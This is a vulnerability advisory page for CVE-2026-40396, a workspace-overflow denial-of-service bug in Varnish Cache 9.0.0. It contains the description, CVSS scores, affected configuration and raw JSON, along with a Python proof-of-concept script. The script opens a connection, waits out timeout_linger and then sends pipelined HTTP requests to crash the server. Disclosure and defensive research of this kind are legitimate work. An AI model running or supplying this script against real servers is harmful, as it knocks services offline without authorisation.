Security Vulnerability Report
中文
CVE-2026-40396 CVSS 4.0 MEDIUM

CVE-2026-40396

Published: 2026-04-12 20:16:19
Last Modified: 2026-04-17 14:38:10
Source: [email protected]

Description

Varnish Cache 9 before 9.0.1 allows a "workspace overflow" denial of service (daemon panic) after timeout_linger. A malicious client could send an HTTP/1 request, wait long enough until the session releases its worker thread (timeout_linger) and resume traffic before the session is closed (timeout_idle) sending more than one request at once to trigger a pipelining operation between requests. This vulnerability affecting Varnish Cache 9.0.0 emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, like partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path configuring pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:* - VULNERABLE
Varnish Cache 9.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import time # Target configuration TARGET_HOST = "127.0.0.1" TARGET_PORT = 80 def exploit_cve_2026_40396(): """ PoC for CVE-2026-40396: Varnish Cache workspace overflow DoS. This script sends an HTTP/1 request, waits for timeout_linger, and then sends pipelined requests to trigger the overflow. """ try: # Establish connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) # Send initial HTTP/1 request payload1 = "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" s.send(payload1.encode()) # Wait for timeout_linger (ensuring worker thread is released but session remains) # Adjust sleep time based on server configuration print("[*] Waiting for timeout_linger...") time.sleep(10) # Send pipelined requests to trigger workspace overflow # Sending multiple requests at once to force pipelining operation payload2 = ( "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" + "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" + "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" ) print("[*] Sending pipelined requests...") s.send(payload2.encode()) # Keep connection open briefly to ensure processing time.sleep(2) s.close() print("[+] Exploit payload sent.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_cve_2026_40396()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40396", "sourceIdentifier": "[email protected]", "published": "2026-04-12T20:16:19.057", "lastModified": "2026-04-17T14:38:09.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Varnish Cache 9 before 9.0.1 allows a \"workspace overflow\" denial of service (daemon panic) after timeout_linger. A malicious client could send an HTTP/1 request, wait long enough until the session releases its worker thread (timeout_linger) and resume traffic before the session is closed (timeout_idle) sending more than one request at once to trigger a pipelining operation between requests. This vulnerability affecting Varnish Cache 9.0.0 emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, like partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path configuring pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-670"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "9868204A-88AD-46D2-BE0B-92FF686B7DE4"}]}]}], "references": [{"url": "https://github.com/varnish/varnish/issues/15", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/varnish/varnish/releases/tag/varnish-9.0.1", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.